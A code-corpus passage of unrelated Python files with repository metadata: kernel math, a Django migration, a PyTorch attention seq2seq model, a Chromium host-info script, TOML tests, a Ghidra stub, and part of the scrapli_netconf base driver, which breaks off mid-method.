* math.log(math.fabs(self._amplitude) / self._limit))) + 1)
else:
print("Error. Selected mode with is not in the proper bounds (0 < width < 10000).")
if (dimension_size % 2 == 0):
dimension_size += 1
return dimension_size
def _calculate_kernel(self):
self._calculate_separated_kernel_parts()
def _calculate_separated_kernel_parts(self):
if (self._separated_kernel_parts is not None):
del(self._separated_kernel_parts[:])
else:
self._separated_kernel_parts = []
for dimension_index in range(self._dimensionality):
dimension_size = self._calculate_dimension_size(dimension_index)
center = (dimension_size / 2.0) + self._shifts[dimension_index]
kernel_part = numpy.zeros(shape=dimension_size)
ramp = numpy.linspace(0, dimension_size, dimension_size)
for i in range(dimension_size):
kernel_part[i] = math.exp(-math.pow(ramp[i] - center, 2.0) / \
(2.0 * math.pow(self._widths[dimension_index], 2.0)))
# normalize kernel part
kernel_part *= 1.0 / kernel_part.sum()
# multiply the first kernel part with the amplitude.
# when convolving with all separated kernel parts, this will lead
# to the correct amplitude value for the "whole kernel"
if (dimension_index == 0):
kernel_part *= self._amplitude
self._separated_kernel_parts.append(kernel_part)
class BoxKernel(Kernel):
"n-dimensional box kernel"
def __init__(self, amplitude = 5.0):
Kernel.__init__(self, amplitude)
self._dimensionality = 1
self._calculate_kernel()
def get_separated_kernel_part(self, dimension_index):
return self._kernel
def _calculate_kernel(self):
self._kernel = numpy.ones(shape=(1)) * self._amplitude
| [
"mathis.richter@ini.rub.de"
] | mathis.richter@ini.rub.de |
4b8c608768319214ed0575a4a3b2502fe5abc8f8 | b5b7607ed739d76064409363a6e7a7fcec7243d6 | /vms/migrations/0002_remove_customer_last_error_time.py | db2a4217b161094915f90d3a42fbefd54cc6329b | [] | no_license | mrleerkotte/vm2ssp-django | d7d07a05ab322b55129803174815bb1522261412 | 0534cc56a76da41ef40d8efc25ffcde83354c3d0 | refs/heads/master | 2020-03-18T23:52:04.333841 | 2018-05-30T11:47:02 | 2018-05-30T11:47:02 | 135,434,591 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | # Generated by Django 2.0.2 on 2018-05-10 14:48
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('vms', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='customer',
name='last_error_time',
),
]
| [
"marlon@leerkotte.net"
] | marlon@leerkotte.net |
69c2a77c69b7711113375217f5e65e281a3b23d8 | baae26fa241488e1461083edb4f1576ad4a58dfc | /attention_module.py | 36e9022a542f68158cd2bc71980147e3b46f5cf2 | [] | no_license | 2020-WORKSPACE/DataScience | 4a8d8674d9749522c973c2316020aecc558d200b | 93c73fed1eaed581fd9fed43de8650bc77971983 | refs/heads/master | 2022-11-15T15:51:54.777649 | 2020-06-28T11:24:26 | 2020-06-28T11:24:26 | 271,176,780 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,956 | py | #####################################################
# Bong Won Jang's Code
# - 2020 06 15 22:28 ☑️
#####################################################
import torch
import torch.nn as nn
import torch.nn.functional as F
############################################
# Encoder
#
# Encoder for seq2seq model with attention mechanism
# This Encoder is based on a LSTM structure
############################################
class Encoder(nn.Module):
############################################
# __init__
#
# <parameters>
# - input_size : the size of input word vocabulary (영어 단어 사전 크기)
# - hidden_size : the size of hidden vector and cell vector
############################################
def __init__(self, input_size, hidden_size):
super(Encoder, self).__init__()
self.input_size = input_size # scalar : We
self.hidden_size = hidden_size # scalar : h
self.cell_size = hidden_size # scalar : h
self.embedding_matrix = nn.Embedding(self.input_size, self.hidden_size) # matrix : (We * h)
self.lstm = nn.LSTM(self.hidden_size, self.hidden_size)
############################################
# forward
#
# <parameters>
# - word_num : the integer number of a word (영어 단어 번호)
# - hidden : hidden vector (h_0 is zero vector)
# - cell : cell vector (c_0 is zero vector)
#
# <return>
# - o : output vector
# - hn : next hidden vector
# - cn : next cell vector
############################################
def forward(self, word_num, hidden, cell):
embedding_vector = self.embedding_matrix.weight[word_num].view(1, 1, -1) # matrix : (1 * 1 * h)
o, (hn, cn) = self.lstm(embedding_vector, (hidden, cell)) # o matrix : (1 * 1 * h)
# hn matrix : (1 * 1 * h)
# cn matrix : (1 * 1 * h)
return o, hn, cn
############################################
# initHidden
#
# <parameters>
# - device : the integer number of a word
#
# <return>
# - initial hidden vector : zero vector
#
# 아직 Pytorch 문법에서 3차원으로 구성해야 하는 이유를 모르겠습니다.
############################################
def initHidden(self, device):
return torch.zeros(1, 1, self.hidden_size, device=device)
############################################
# initCell
#
# <parameters>
# - device : the integer number of a word
#
# <return>
# - initial cell vector : zero vector
#
# 아직 Pytorch 문법에서 3차원으로 구성해야 하는 이유를 모르겠습니다.
############################################
def initCell(self, device):
return torch.zeros(1, 1, self.cell_size, device=device)
############################################
# Decoder
#
# Decoder for seq2seq model with attention mechanism
# This Decoder is based on a LSTM structure
############################################
class Decoder(nn.Module):
############################################
# __init__
#
# <parameters>
# - output_size : the size of output word vocabulary (프랑스어 단어 사전 크기)
# - hidden_size : the size of hidden vector
# - max_length : the max length of output sentence
############################################
def __init__(self, output_size, hidden_size):
super(Decoder, self).__init__()
self.output_size = output_size # scalar : Wd
self.hidden_size = hidden_size # scalar : h
self.cell_size = hidden_size # scalar : h
self.embedding_matrix = nn.Embedding(self.output_size, self.hidden_size) # matrix : (Wd * h)
self.lstm = nn.LSTM(hidden_size, hidden_size)
self.out_linear = nn.Linear(self.hidden_size * 2, self.output_size) # eq : (1 * Wd) = (1 * 2h) x (2h * Wd)
############################################
# forward
#
# <parameters> <size>
# - word_num : the integer number of a word (프랑스 단어 번호) : scalar
# - hidden : hidden vector : h
# - cell : cell vector (c_0 is zero vector) : h
# - hs : pile of all hidden vector from encoder : (N * h)
#
# <return>
# - o : output vector
# - hn : next hidden vector
# - cn : next cell vector
############################################
def forward(self, word_num, hidden, cell, hs):
embedding_vector = self.embedding_matrix(word_num).view(1, 1, -1) # matrix : (1 * 1 * h)
o, (hn, cn) = self.lstm(embedding_vector, (hidden, cell)) # o matrix : (1 * 1 * h)
# hn matrix : (1 * 1 * h)
# cn matrix : (1 * 1 * h)
attn_score = torch.mm(hs, hn.view(-1, 1)).view(1, -1) # (1 * N) = (N * h) x (h * 1)
attn_distr = F.softmax(attn_score, dim=1) # (1 * N) = softmax(1 * N)
attn_output = torch.mm(attn_distr, hs) # (1 * h) = (1 * N) x (N * h)
#################################
# NLLLoss를 사용하기 위해서, Decoder의 y는 log_softmax를 이용해야 한다.
#################################
y = F.log_softmax(self.out_linear(torch.cat((attn_output, hn.view(1, -1)), dim=1)), dim=1) # (1 * output_size)
# = softmax
# { (1 * 2h)
# x
# (2h * Wd) }
return y, hn, cn, attn_distr
############################################
# initHidden
#
# <parameters>
# - device : the integer number of a word
#
# <return>
# - initial hidden vector : zero vector
#
# 아직 Pytorch 문법에서 3차원으로 구성해야 하는 이유를 모르겠습니다.
############################################
def initHidden(self, device):
return torch.zeros(1, 1, self.hidden_size, device=device)
############################################
# initCell
#
# <parameters>
# - device : the integer number of a word
#
# <return>
# - initial cell vector : zero vector
#
# 아직 Pytorch 문법에서 3차원으로 구성해야 하는 이유를 모르겠습니다.
############################################
def initCell(self, device):
return torch.zeros(1, 1, self.cell_size, device=device)
| [
"noreply@github.com"
] | noreply@github.com |
e8d813ee2bbd08042d7a9a7b775b27efe30c22f9 | 45dec2872306279bda5c060181952657e87c941a | /src/testing/scripts/host_info.py | 37fa54b4ebdd5f9beb1689a2a9356742c328d3a4 | [
"BSD-3-Clause"
] | permissive | mbbill/Chromium_Base | 717266ab816f65125ddffd2f22ea3b562c9bf0c9 | 12d8ff888632345762e13c997fa78a7992881cc8 | refs/heads/master | 2020-04-16T01:53:00.094385 | 2017-02-14T02:44:23 | 2017-02-14T02:44:23 | 62,381,185 | 17 | 14 | null | null | null | null | UTF-8 | Python | false | false | 3,754 | py | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import multiprocessing
import os
import platform
import subprocess
import sys
import common
def is_linux():
return sys.platform.startswith('linux')
def get_free_disk_space(failures):
"""Returns the amount of free space on the current disk, in GiB.
Returns:
The amount of free space on the current disk, measured in GiB.
"""
if os.name == 'posix':
# Stat the current path for info on the current disk.
stat_result = os.statvfs('.')
# Multiply block size by number of free blocks, express in GiB.
return stat_result.f_frsize * stat_result.f_bavail / (1024.0 ** 3)
failures.append('get_free_disk_space: OS %s not supported.' % os.name)
return 0
def get_num_cpus(failures):
"""Returns the number of logical CPUs on this machine.
Returns:
The number of logical CPUs on this machine, or 'unknown' if indeterminate.
"""
try:
return multiprocessing.cpu_count()
except NotImplementedError:
failures.append('get_num_cpus')
return 'unknown'
def get_device_info(args, failures):
"""Parses the device info for each attached device, and returns a summary
of the device info and any mismatches.
Returns:
A dict indicating the result.
"""
if not is_linux():
return {}
with common.temporary_file() as tempfile_path:
rc = common.run_command([
sys.executable,
os.path.join(args.paths['checkout'],
'third_party',
'catapult',
'devil',
'devil',
'android',
'tools',
'device_status.py'),
'--json-output', tempfile_path,
'--blacklist-file', os.path.join(
args.paths['checkout'], 'out', 'bad_devices.json')])
if rc:
failures.append('device_status')
return {}
with open(tempfile_path, 'r') as src:
device_info = json.load(src)
results = {}
results['devices'] = sorted(v['serial'] for v in device_info)
details = [
v['ro.build.fingerprint'] for v in device_info if not v['blacklisted']]
def unique_build_details(index):
return sorted(list(set([v.split(':')[index] for v in details])))
parsed_details = {
'device_names': unique_build_details(0),
'build_versions': unique_build_details(1),
'build_types': unique_build_details(2),
}
for k, v in parsed_details.iteritems():
if len(v) == 1:
results[k] = v[0]
else:
results[k] = 'MISMATCH'
results['%s_list' % k] = v
failures.append(k)
for v in device_info:
if v['blacklisted']:
failures.append('Device %s blacklisted' % v['serial'])
return results
def main_run(args):
failures = []
host_info = {}
host_info['os_system'] = platform.system()
host_info['os_release'] = platform.release()
host_info['processor'] = platform.processor()
host_info['num_cpus'] = get_num_cpus(failures)
host_info['free_disk_space'] = get_free_disk_space(failures)
host_info['python_version'] = platform.python_version()
host_info['python_path'] = sys.executable
host_info['devices'] = get_device_info(args, failures)
json.dump({
'valid': True,
'failures': failures,
'_host_info': host_info,
}, args.output)
if len(failures) != 0:
return common.INFRA_FAILURE_EXIT_CODE
return 0
def main_compile_targets(args):
json.dump([], args.output)
if __name__ == '__main__':
funcs = {
'run': main_run,
'compile_targets': main_compile_targets,
}
sys.exit(common.run_script(sys.argv[1:], funcs))
| [
"mbbill@gmail.com"
] | mbbill@gmail.com |
63d35cddd89c965242e94321cf091a8e71be87ec | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_swivels.py | ee26ae2f31371bd1bbcf01ad3ec765b20b2961cb | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py |
from xai.brain.wordbase.verbs._swivel import _SWIVEL
#calss header
class _SWIVELS(_SWIVEL, ):
def __init__(self,):
_SWIVEL.__init__(self)
self.name = "SWIVELS"
self.specie = 'verbs'
self.basic = "swivel"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
d5fc867cf915437ad5f65f07e94dd1e3c0cf089d | 101ffbee515a5b8f23d77361558dea1e42794dbd | /pip_save/toml/tests/test_writer/test_statement_nodes.py | 87c6eb7bd5d88df7645289d2751f38fa6795af0e | [] | no_license | mkurnikov/pip-save | 0a841710c28983c1c769d87e18f2e584a554e1a1 | e1e2fb9b0404a25790edcb5fd134267b92675470 | refs/heads/master | 2021-01-12T16:49:50.163661 | 2016-10-21T11:13:37 | 2016-10-21T11:13:37 | 71,442,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,008 | py | from collections import OrderedDict
from unittest import TestCase
from pip_save.toml.model import TomlStatementNodes, Table
class TestStatementNodes(TestCase):
def test_append(self):
toml_nodes = TomlStatementNodes()
toml_nodes[('keyword',)] = '1'
self.assertEqual(len(toml_nodes), 1)
self.assertTrue(('keyword',) in toml_nodes)
def test_insert_after(self):
od = OrderedDict()
od[('deps',)] = Table()
od[('django',)] = '1.10.2'
toml_nodes = TomlStatementNodes(od)
toml_nodes.insert_after(('deps',), ('flask',), '1.3')
self.assertEqual(toml_nodes.keys(), [('deps',), ('flask',), ('django',)])
def test_insert_before(self):
od = OrderedDict()
od[('deps',)] = Table()
od[('django',)] = '1.10.2'
toml_nodes = TomlStatementNodes(od)
toml_nodes.insert_before(('django',), ('flask',), '1.3')
self.assertEqual(toml_nodes.keys(), [('deps',), ('flask',), ('django',)])
| [
"maxim.kurnikov@gmail.com"
] | maxim.kurnikov@gmail.com |
a9dbd0cdcd940053789e278ea1754c00d7bcc81d | 786027545626c24486753351d6e19093b261cd7d | /ghidra9.2.1_pyi/ghidra/app/plugin/core/diff/DiffProgramManager.pyi | a0a10fe1025a5187fd858ff298fe56649ee228e8 | [
"MIT"
] | permissive | kohnakagawa/ghidra_scripts | 51cede1874ef2b1fed901b802316449b4bf25661 | 5afed1234a7266c0624ec445133280993077c376 | refs/heads/main | 2023-03-25T08:25:16.842142 | 2021-03-18T13:31:40 | 2021-03-18T13:31:40 | 338,577,905 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,233 | pyi | from typing import List
import ghidra.app.services
import ghidra.framework.model
import ghidra.program.model.address
import ghidra.program.model.listing
import java.awt
import java.lang
import java.net
class DiffProgramManager(object, ghidra.app.services.ProgramManager):
OPEN_CURRENT: int = 1
OPEN_HIDDEN: int = 0
OPEN_VISIBLE: int = 2
def __init__(self, __a0: ghidra.app.plugin.core.diff.ProgramDiffPlugin): ...
def closeAllPrograms(self, __a0: bool) -> bool: ...
def closeOtherPrograms(self, __a0: bool) -> bool: ...
@overload
def closeProgram(self) -> bool: ...
@overload
def closeProgram(self, __a0: ghidra.program.model.listing.Program, __a1: bool) -> bool: ...
def equals(self, __a0: object) -> bool: ...
def getAllOpenPrograms(self) -> List[ghidra.program.model.listing.Program]: ...
def getClass(self) -> java.lang.Class: ...
def getCurrentProgram(self) -> ghidra.program.model.listing.Program: ...
def getProgram(self, __a0: ghidra.program.model.address.Address) -> ghidra.program.model.listing.Program: ...
def hashCode(self) -> int: ...
def isLocked(self) -> bool: ...
def isVisible(self, __a0: ghidra.program.model.listing.Program) -> bool: ...
def lockDown(self, __a0: bool) -> None: ...
def notify(self) -> None: ...
def notifyAll(self) -> None: ...
@overload
def openProgram(self, __a0: ghidra.framework.model.DomainFile) -> ghidra.program.model.listing.Program: ...
@overload
def openProgram(self, __a0: ghidra.program.model.listing.Program) -> None: ...
@overload
def openProgram(self, __a0: ghidra.framework.model.DomainFile, __a1: int) -> ghidra.program.model.listing.Program: ...
@overload
def openProgram(self, __a0: ghidra.program.model.listing.Program, __a1: int) -> None: ...
@overload
def openProgram(self, __a0: java.net.URL, __a1: int) -> ghidra.program.model.listing.Program: ...
@overload
def openProgram(self, __a0: ghidra.program.model.listing.Program, __a1: bool) -> None: ...
@overload
def openProgram(self, __a0: ghidra.framework.model.DomainFile, __a1: java.awt.Component) -> ghidra.program.model.listing.Program: ...
@overload
def openProgram(self, __a0: ghidra.framework.model.DomainFile, __a1: int, __a2: int) -> ghidra.program.model.listing.Program: ...
def releaseProgram(self, __a0: ghidra.program.model.listing.Program, __a1: object) -> None: ...
def setCurrentProgram(self, __a0: ghidra.program.model.listing.Program) -> None: ...
def setPersistentOwner(self, __a0: ghidra.program.model.listing.Program, __a1: object) -> bool: ...
def toString(self) -> unicode: ...
@overload
def wait(self) -> None: ...
@overload
def wait(self, __a0: long) -> None: ...
@overload
def wait(self, __a0: long, __a1: int) -> None: ...
@property
def allOpenPrograms(self) -> List[ghidra.program.model.listing.Program]: ...
@property
def currentProgram(self) -> ghidra.program.model.listing.Program: ...
@currentProgram.setter
def currentProgram(self, value: ghidra.program.model.listing.Program) -> None: ...
@property
def locked(self) -> bool: ...
| [
"tsunekou1019@gmail.com"
] | tsunekou1019@gmail.com |
f2f3266efd903079ca767cb4f1fa1d9cf64c745e | b370b955afa231e7f6c79fe4c95af687661ebc24 | /.venv/lib/python3.9/site-packages/scrapli_netconf/driver/base_driver.py | a94d437f3d15e2fa0b9379a21f15a2dad07f05e5 | [] | no_license | HWNET12/Nornir | e9e152cc2d477feb38a99afce08b8c36b3f4b1b6 | 26ca756664c209b9205816c35bddf2216a0182e0 | refs/heads/main | 2023-08-13T15:10:28.496854 | 2021-10-06T16:26:43 | 2021-10-06T16:26:43 | 414,286,563 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37,432 | py | # pylint: disable=C0302
"""scrapli_netconf.driver.base_driver"""
import importlib
from dataclasses import fields
from enum import Enum
from typing import Any, Callable, List, Optional, Tuple, Union
from lxml import etree
from lxml.etree import _Element
from scrapli.driver.base.base_driver import BaseDriver
from scrapli.exceptions import ScrapliTypeError, ScrapliValueError
from scrapli.helper import user_warning
from scrapli_netconf.channel.base_channel import NetconfBaseChannelArgs
from scrapli_netconf.constants import NetconfClientCapabilities, NetconfVersion, XmlParserVersion
from scrapli_netconf.exceptions import CapabilityNotSupported
from scrapli_netconf.response import NetconfResponse
COMPRESSED_PARSER = etree.XMLParser(remove_blank_text=True, recover=True)
STANDARD_PARSER = etree.XMLParser(remove_blank_text=False, recover=True)
class NetconfBaseOperations(Enum):
FILTER_SUBTREE = "<filter type='{filter_type}'></filter>"
FILTER_XPATH = "<filter type='{filter_type}' select='{xpath}'></filter>"
WITH_DEFAULTS_SUBTREE = (
"<with-defaults xmlns='urn:ietf:params:xml:ns:yang:ietf-netconf-with-defaults'>"
"{default_type}</with-defaults>"
)
GET = "<get></get>"
GET_CONFIG = "<get-config><source><{source}/></source></get-config>"
EDIT_CONFIG = "<edit-config><target><{target}/></target></edit-config>"
DELETE_CONFIG = "<delete-config><target><{target}/></target></delete-config>"
COPY_CONFIG = (
"<copy-config><target><{target}/></target><source><{source}/></source></copy-config>"
)
COMMIT = "<commit/>"
DISCARD = "<discard-changes/>"
LOCK = "<lock><target><{target}/></target></lock>"
UNLOCK = "<unlock><target><{target}/></target></unlock>"
RPC = "<rpc xmlns='urn:ietf:params:xml:ns:netconf:base:1.0' message-id='{message_id}'></rpc>"
VALIDATE = "<validate><source><{source}/></source></validate>"
class NetconfBaseDriver(BaseDriver):
host: str
readable_datastores: List[str]
writeable_datastores: List[str]
strip_namespaces: bool
strict_datastores: bool
flatten_input: bool
_netconf_base_channel_args: NetconfBaseChannelArgs
@property
def netconf_version(self) -> NetconfVersion:
"""
Getter for 'netconf_version' attribute
Args:
N/A
Returns:
NetconfVersion: netconf_version enum
Raises:
N/A
"""
return self._netconf_base_channel_args.netconf_version
@netconf_version.setter
def netconf_version(self, value: NetconfVersion) -> None:
"""
Setter for 'netconf_version' attribute
Args:
value: NetconfVersion
Returns:
None
Raises:
ScrapliTypeError: if value is not of type NetconfVersion
"""
if not isinstance(value, NetconfVersion):
raise ScrapliTypeError
self.logger.debug(f"setting 'netconf_version' value to '{value.value}'")
self._netconf_base_channel_args.netconf_version = value
if self._netconf_base_channel_args.netconf_version == NetconfVersion.VERSION_1_0:
self._base_channel_args.comms_prompt_pattern = "]]>]]>"
else:
self._base_channel_args.comms_prompt_pattern = r"^##$"
@property
def client_capabilities(self) -> NetconfClientCapabilities:
"""
Getter for 'client_capabilities' attribute
Args:
N/A
Returns:
NetconfClientCapabilities: netconf client capabilities enum
Raises:
N/A
"""
return self._netconf_base_channel_args.client_capabilities
@client_capabilities.setter
def client_capabilities(self, value: NetconfClientCapabilities) -> None:
"""
Setter for 'client_capabilities' attribute
Args:
value: NetconfClientCapabilities value for client_capabilities
Returns:
None
Raises:
ScrapliTypeError: if value is not of type NetconfClientCapabilities
"""
if not isinstance(value, NetconfClientCapabilities):
raise ScrapliTypeError
self.logger.debug(f"setting 'client_capabilities' value to '{value.value}'")
self._netconf_base_channel_args.client_capabilities = value
@property
def server_capabilities(self) -> List[str]:
"""
Getter for 'server_capabilities' attribute
Args:
N/A
Returns:
list: list of strings of server capabilities
Raises:
N/A
"""
return self._netconf_base_channel_args.server_capabilities or []
@server_capabilities.setter
def server_capabilities(self, value: NetconfClientCapabilities) -> None:
"""
Setter for 'server_capabilities' attribute
Args:
value: list of strings of netconf server capabilities
Returns:
None
Raises:
ScrapliTypeError: if value is not of type list
"""
if not isinstance(value, list):
raise ScrapliTypeError
self.logger.debug(f"setting 'server_capabilities' value to '{value}'")
self._netconf_base_channel_args.server_capabilities = value
@staticmethod
def _determine_preferred_netconf_version(
preferred_netconf_version: Optional[str],
) -> NetconfVersion:
"""
Determine users preferred netconf version (if applicable)
Args:
preferred_netconf_version: optional string indicating users preferred netconf version
Returns:
NetconfVersion: users preferred netconf version
Raises:
ScrapliValueError: if preferred_netconf_version is not None or a valid option
"""
if preferred_netconf_version is None:
return NetconfVersion.UNKNOWN
if preferred_netconf_version == "1.0":
return NetconfVersion.VERSION_1_0
if preferred_netconf_version == "1.1":
return NetconfVersion.VERSION_1_1
raise ScrapliValueError(
"'preferred_netconf_version' provided with invalid value, must be one of: "
"None, '1.0', or '1.1'"
)
@staticmethod
def _determine_preferred_xml_parser(use_compressed_parser: bool) -> XmlParserVersion:
"""
Determine users preferred xml payload parser
Args:
use_compressed_parser: bool indicating use of compressed parser or not
Returns:
XmlParserVersion: users xml parser version
Raises:
N/A
"""
if use_compressed_parser is True:
return XmlParserVersion.COMPRESSED_PARSER
return XmlParserVersion.STANDARD_PARSER
@property
def xml_parser(self) -> etree.XMLParser:
"""
Getter for 'xml_parser' attribute
Args:
N/A
Returns:
etree.XMLParser: parser to use for parsing xml documents
Raises:
N/A
"""
if self._netconf_base_channel_args.xml_parser == XmlParserVersion.COMPRESSED_PARSER:
return COMPRESSED_PARSER
return STANDARD_PARSER
@xml_parser.setter
def xml_parser(self, value: XmlParserVersion) -> None:
"""
Setter for 'xml_parser' attribute
Args:
value: enum indicating parser version to use
Returns:
None
Raises:
ScrapliTypeError: if value is not of type XmlParserVersion
"""
if not isinstance(value, XmlParserVersion):
raise ScrapliTypeError
self._netconf_base_channel_args.xml_parser = value
def _transport_factory(self) -> Tuple[Callable[..., Any], object]:
"""
Determine proper transport class and necessary arguments to initialize that class
Args:
N/A
Returns:
Tuple[Callable[..., Any], object]: tuple of transport class and dataclass of transport
class specific arguments
Raises:
N/A
"""
transport_plugin_module = importlib.import_module(
f"scrapli_netconf.transport.plugins.{self.transport_name}.transport"
)
transport_class = getattr(
transport_plugin_module, f"Netconf{self.transport_name.capitalize()}Transport"
)
plugin_transport_args_class = getattr(transport_plugin_module, "PluginTransportArgs")
_plugin_transport_args = {
field.name: getattr(self, field.name) for field in fields(plugin_transport_args_class)
}
plugin_transport_args = plugin_transport_args_class(**_plugin_transport_args)
return transport_class, plugin_transport_args
def _build_readable_datastores(self) -> None:
"""
Build a list of readable datastores based on server's advertised capabilities
Args:
N/A
Returns:
None
Raises:
N/A
"""
self.readable_datastores = []
self.readable_datastores.append("running")
if "urn:ietf:params:netconf:capability:candidate:1.0" in self.server_capabilities:
self.readable_datastores.append("candidate")
if "urn:ietf:params:netconf:capability:startup:1.0" in self.server_capabilities:
self.readable_datastores.append("startup")
def _build_writeable_datastores(self) -> None:
"""
Build a list of writeable/editable datastores based on server's advertised capabilities
Args:
N/A
Returns:
None
Raises:
N/A
"""
self.writeable_datastores = []
if "urn:ietf:params:netconf:capability:writeable-running:1.0" in self.server_capabilities:
self.writeable_datastores.append("running")
if "urn:ietf:params:netconf:capability:writable-running:1.0" in self.server_capabilities:
# NOTE: iosxe shows "writable" (as of 2020.07.01) despite RFC being "writeable"
self.writeable_datastores.append("running")
if "urn:ietf:params:netconf:capability:candidate:1.0" in self.server_capabilities:
self.writeable_datastores.append("candidate")
if "urn:ietf:params:netconf:capability:startup:1.0" in self.server_capabilities:
self.writeable_datastores.append("startup")
def _validate_get_config_target(self, source: str) -> None:
"""
Validate get-config source is acceptable
Args:
source: configuration source to get; typically one of running|startup|candidate
Returns:
None
Raises:
ScrapliValueError: if an invalid source was selected and strict_datastores is True
"""
if source not in self.readable_datastores:
msg = f"'source' should be one of {self.readable_datastores}, got '{source}'"
self.logger.warning(msg)
if self.strict_datastores is True:
raise ScrapliValueError(msg)
user_warning(title="Invalid datastore source!", message=msg)
def _validate_edit_config_target(self, target: str) -> None:
"""
Validate edit-config/lock/unlock target is acceptable
Args:
target: configuration source to edit/lock; typically one of running|startup|candidate
Returns:
None
Raises:
ScrapliValueError: if an invalid source was selected
"""
if target not in self.writeable_datastores:
msg = f"'target' should be one of {self.writeable_datastores}, got '{target}'"
self.logger.warning(msg)
if self.strict_datastores is True:
raise ScrapliValueError(msg)
user_warning(title="Invalid datastore target!", message=msg)
def _validate_delete_config_target(self, target: str) -> None:
"""
Validate delete-config/lock/unlock target is acceptable
Args:
target: configuration source to delete; typically one of startup|candidate
Returns:
None
Raises:
ScrapliValueError: if an invalid target was selected
"""
if target == "running" or target not in self.writeable_datastores:
msg = f"'target' should be one of {self.writeable_datastores}, got '{target}'"
if target == "running":
msg = "delete-config 'target' may not be 'running'"
self.logger.warning(msg)
if self.strict_datastores is True:
raise ScrapliValueError(msg)
user_warning(title="Invalid datastore target!", message=msg)
def _build_base_elem(self) -> _Element:
"""
Create base element for netconf operations
Args:
N/A
Returns:
_Element: lxml base element to use for netconf operation
Raises:
N/A
"""
# pylint did not seem to want to be ok with assigning this as a class attribute... and its
# only used here so... here we are
self.message_id: int # pylint: disable=W0201
self.logger.debug(f"Building base element for message id {self.message_id}")
base_xml_str = NetconfBaseOperations.RPC.value.format(message_id=self.message_id)
self.message_id += 1
base_elem = etree.fromstring(text=base_xml_str)
return base_elem
def _build_filter(self, filter_: str, filter_type: str = "subtree") -> _Element:
"""
Create filter element for a given rpc
The `filter_` string may contain multiple xml elements at its "root" (subtree filters); we
will simply place the payload into a temporary "tmp" outer tag so that when we cast it to an
etree object the elements are all preserved; without this outer "tmp" tag, lxml will scoop
up only the first element provided as it appears to be the root of the document presumably.
An example valid (to scrapli netconf at least) xml filter would be:
```
<interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg">
<interface-configuration>
<active>act</active>
</interface-configuration>
</interface-configurations>
<netconf-yang xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-man-netconf-cfg">
</netconf-yang>
```
Args:
filter_: strings of filters to build into a filter element or (for subtree) a full
filter string (in filter tags)
filter_type: type of filter; subtree|xpath
Returns:
_Element: lxml filter element to use for netconf operation
Raises:
CapabilityNotSupported: if xpath selected and not supported on server
ScrapliValueError: if filter_type is not one of subtree|xpath
"""
if filter_type == "subtree":
# tmp tags to place the users kinda not valid xml filter into
_filter_ = f"<tmp>{filter_}</tmp>"
# "validate" subtree filter by forcing it into xml, parser "flattens" it as well
tmp_xml_filter_element = etree.fromstring(_filter_, parser=self.xml_parser)
if tmp_xml_filter_element.getchildren()[0].tag == "filter":
# if the user filter was already wrapped in filter tags we'll end up here, we will
# blindly reuse the users filter but we'll make sure that the filter "type" is set
xml_filter_elem = tmp_xml_filter_element.getchildren()[0]
xml_filter_elem.attrib["type"] = "subtree"
else:
xml_filter_elem = etree.fromstring(
NetconfBaseOperations.FILTER_SUBTREE.value.format(filter_type=filter_type),
)
# iterate through the children inside the tmp tags and insert *those* elements into
# the actual final filter payload
for xml_filter_element in tmp_xml_filter_element:
# insert the subtree filter into the parent filter element
xml_filter_elem.insert(1, xml_filter_element)
elif filter_type == "xpath":
if "urn:ietf:params:netconf:capability:xpath:1.0" not in self.server_capabilities:
msg = "xpath filter requested, but is not supported by the server"
self.logger.exception(msg)
raise CapabilityNotSupported(msg)
xml_filter_elem = etree.fromstring(
NetconfBaseOperations.FILTER_XPATH.value.format(
filter_type=filter_type, xpath=filter_
),
parser=self.xml_parser,
)
else:
raise ScrapliValueError(
f"'filter_type' should be one of subtree|xpath, got '{filter_type}'"
)
return xml_filter_elem
def _build_with_defaults(self, default_type: str = "report-all") -> _Element:
"""
Create with-defaults element for a given operation
Args:
default_type: enumeration of with-defaults; report-all|trim|explicit|report-all-tagged
Returns:
_Element: lxml with-defaults element to use for netconf operation
Raises:
CapabilityNotSupported: if default_type provided but not supported by device
ScrapliValueError: if default_type is not one of
report-all|trim|explicit|report-all-tagged
"""
if default_type in ["report-all", "trim", "explicit", "report-all-tagged"]:
if (
"urn:ietf:params:netconf:capability:with-defaults:1.0"
not in self.server_capabilities
):
msg = "with-defaults requested, but is not supported by the server"
self.logger.exception(msg)
raise CapabilityNotSupported(msg)
xml_with_defaults_element = etree.fromstring(
NetconfBaseOperations.WITH_DEFAULTS_SUBTREE.value.format(default_type=default_type),
parser=self.xml_parser,
)
else:
raise ScrapliValueError(
"'default_type' should be one of report-all|trim|explicit|report-all-tagged, "
f"got '{default_type}'"
)
return xml_with_defaults_element
def _finalize_channel_input(self, xml_request: _Element) -> bytes:
"""
Create finalized channel input (as bytes)
Args:
xml_request: finalized xml element to cast to bytes and add declaration to
Returns:
bytes: finalized bytes input -- with 1.0 delimiter or 1.1 encoding
Raises:
N/A
"""
channel_input: bytes = etree.tostring(
element_or_tree=xml_request, xml_declaration=True, encoding="utf-8"
)
if self.netconf_version == NetconfVersion.VERSION_1_0:
channel_input = channel_input + b"]]>]]>"
else:
# format message for chunk (netconf 1.1) style message
channel_input = b"#%b\n" % str(len(channel_input)).encode() + channel_input + b"\n##"
return channel_input
def _pre_get(self, filter_: str, filter_type: str = "subtree") -> NetconfResponse:
"""
